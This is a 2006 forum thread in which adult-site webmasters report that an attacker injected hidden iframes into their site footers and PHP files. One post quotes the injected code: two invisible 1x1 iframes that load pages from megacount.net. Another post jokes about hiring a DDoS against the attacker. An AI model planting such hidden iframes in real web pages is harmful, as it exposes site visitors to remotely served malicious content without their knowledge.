GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   HACKED! by megacount.net (https://gfy.com/showthread.php?t=662380)

escorpio 10-04-2006 08:42 AM

HACKED! by megacount.net
 
Anybody else having a problem with this russian motherfucker? :mad:

Martin3 10-04-2006 08:44 AM

yeah, was a recent thread in another forum with the same site

dissipate 10-04-2006 08:49 AM

Most adult servers lack even basic security measures. It's like shooting fish in a barrel.

SinSational 10-04-2006 08:50 AM

http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked-2.html

http://www.gofuckyourself.com/showthread.php?t=661811

Georgio 10-04-2006 08:51 AM

Quote:

Originally Posted by dissipate
Most adult servers lack even basic security measures. It's like shooting fish in a barrel.


Yeah I know what u mean....:winkwink:

escorpio 10-04-2006 08:51 AM

Quote:

Originally Posted by dissipate
Most adult servers lack even basic security measures. It's like shooting fish in a barrel.

I've found that out the hard way this past week. :(

Verbal 10-04-2006 08:53 AM

Do you use Webair?

boldy 10-04-2006 08:56 AM

One of my servers got it too .. :(

escorpio 10-04-2006 08:58 AM

Quote:

Originally Posted by Verbal
Do you use Webair?

Yes, webair virtual.

escorpio 10-04-2006 08:59 AM

thank you

killerkay 10-04-2006 09:01 AM

damn sucks man :(

killerkay 10-04-2006 09:01 AM

double post er

Verbal 10-04-2006 09:03 AM

Quote:

Originally Posted by escorpio
Yes, webair virtual.

I've been going back and forth with them and they want me to update ALL of the scripts for my sites ... a list about a mile long.

I'm seriously considering switching hosts. There must be something they can or do. The damn thing keeps coming back everyday. First it was uniqcount

Klen 10-04-2006 09:08 AM

Try dwhs,they update their servers same moment when exploit or some holle goes out.

escorpio 10-04-2006 09:10 AM

Quote:

Originally Posted by Verbal
I've been going back and forth with them and they want me to update ALL of the scripts for my sites ... a list about a mile long.

I'm seriously considering switching hosts. There must be something they can or do. The damn thing keeps coming back everyday. First it was uniqcount

Same story here. I'm switching now and it's going to be a big fucking pain in the ass. :mad:

Devilporn 10-04-2006 09:24 AM

Does someone know if it has anything to do with Wordpress?

Gillespie 10-04-2006 09:31 AM

How are they getting in? Please post your /var/log/messages

boldy 10-04-2006 10:12 AM

For me they just walked in using a ssh account. No failures or anything, 1 guess and they were in. I passed this account to 1 person only. I'll investigate more before i start drama

emthree 10-04-2006 03:52 PM

Drama time. I ALSO HAVE BEEN "HACKED" by megacount.net
It's on a webair virtual account. I ONLY RECENTLY installed wordpress onto this domain, less than a week ago.

emthree 10-04-2006 03:53 PM

Someone get webair in here.

madawgz 10-04-2006 03:53 PM

hire someone to ddos him...2c

not me ;)

Devilporn 10-04-2006 03:54 PM

Quote:

Originally Posted by emthree
Someone get webair in here.

Contact them directly, you'll have better results

emthree 10-04-2006 03:54 PM

Question to the people who got hacked: Do you guys have ABP installed?

Dveron 10-04-2006 03:55 PM

Sounds like Webair need to update their shit

emthree 10-04-2006 03:56 PM

Quote:

Originally Posted by Devilporn
Contact them directly, you'll have better results

Not really. I've seen the chat log with RobV.
This is something effecting a lot of their customers. They need to address it publicly.

JOHNNY_BUTTHOLES 10-04-2006 03:59 PM

it's all over my sites. two wordpress blogs i noticed first. but then i noticed it on regular sites with no scripts.

i'm on realitychecknetworks NOT webair.

Devilporn 10-04-2006 04:00 PM

Quote:

Originally Posted by emthree
Not really. I've seen the chat log with RobV.
This is something effecting a lot of their customers. They need to address it publicly.

You still have nothing to lose contacting them directly to take care of your own case...that's what we did today to get our own tgps fixed.

emthree 10-04-2006 04:03 PM

This is pretty crazy. Does this mean the person has full access to our ftp files?
My sites are setup to use phpinclude to attatch the footer(s) onto my pages. This person found both my footer .html files and inserted the code into both. WTF?

I was going to upgrade to a webair dedicated for these sites too. I guess I have to look elsewhere now.

emthree 10-04-2006 04:05 PM

PHP Code:

<iframe src='http://megacount.net/adv/new.php?adv=167' width=1 height=1></iframe
<
iframe src='http://megacount.net/adv/167/new.php' width=1 height=1></iframe


Superterrorizer 10-04-2006 04:05 PM

Quote:

Originally Posted by Verbal
I've been going back and forth with them and they want me to update ALL of the scripts for my sites ... a list about a mile long.

I'm seriously considering switching hosts. There must be something they can or do. The damn thing keeps coming back everyday. First it was uniqcount


You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.


Switching hosts isn't going to magically update all your scripts and fix your security problems.

JOHNNY_BUTTHOLES 10-04-2006 04:10 PM

Quote:

Originally Posted by Superterrorizer
You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.


Switching hosts isn't going to magically update all your scripts and fix your security problems.

this thing hit two of my wordpress sites that are running the very latest version. the other sites are not running any scripts. it attached itself to a regular footer that spanned by site.

emthree 10-04-2006 04:12 PM

Quote:

Originally Posted by Superterrorizer
You are going to switch hosts because you didn't keep your scripts up to date and your out dated insecure scripts are being exploited? Unless that service is part of your contract or SLA it's YOUR responsibility to keep your scripts up to date, not your hosts.

While many potential security threats both known and unknown can be blocked, many cannot. If your server gets hacked via an exploit in the OS or an application (apache, php, mysql, etc) then it's your hosts fault (Unless you are unmanaged/colo). If one of your sites gets hacked/defaced due to you not keeping your scripts up to date, it's your fault.


Switching hosts isn't going to magically update all your scripts and fix your security problems.

I agree with you. However I believe the problem is webair itself.
I only added wordpress onto this site less than a week ago. It is using the latest version of WP and it was installed in a SUBFolder. My SUBFolders with wp were not compromised, it was my site's index.

emthree 10-04-2006 04:13 PM

Question: are you guys running google analytics?
It inserted itself right below my analytics code.

JOHNNY_BUTTHOLES 10-04-2006 04:19 PM

Quote:

Originally Posted by emthree
Question: are you guys running google analytics?
It inserted itself right below my analytics code.

nope. this thing is installing itself on regular PHP files.

HunkyLuke 10-04-2006 04:22 PM

Quote:

Originally Posted by escorpio
Same story here. I'm switching now and it's going to be a big fucking pain in the ass. :mad:

switching hosts does NOT have to be painful as long as your new host is knowledgeable and is willing to help you out. Generally speaking, we set aside 1 full day to help clients by doing content moves, re-jigging scripts/htaccess files/etc with new path info, setting up and importing databases, recreating mail accounts, etc...

good luck with your new choice, whoever they may be!

cheers,
Luke

bigalownz 10-04-2006 07:09 PM

i got the same problem on one of my other sites

its with revsharehosting and i got nothing on the site at all

just a blank page

marketsmart 10-04-2006 07:12 PM

webair should be protecting you, unless its software you use on your site thats not owned by webair

emthree 10-04-2006 10:56 PM

BUMP - Did anyone contact wordpress?

emthree 10-04-2006 11:04 PM

Quote:

Originally Posted by bigalownz
i got the same problem on one of my other sites

its with revsharehosting and i got nothing on the site at all

just a blank page

Did/do you have wordpress installed on that site?

JOHNNY_BUTTHOLES 10-04-2006 11:55 PM

Quote:

Originally Posted by emthree
Did/do you have wordpress installed on that site?

you have to go though every one of your files and look for the iframe code. delete it and change the permissions to read only. i had to do this with every one of my sites today :(


All times are GMT -7. The time now is 01:47 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc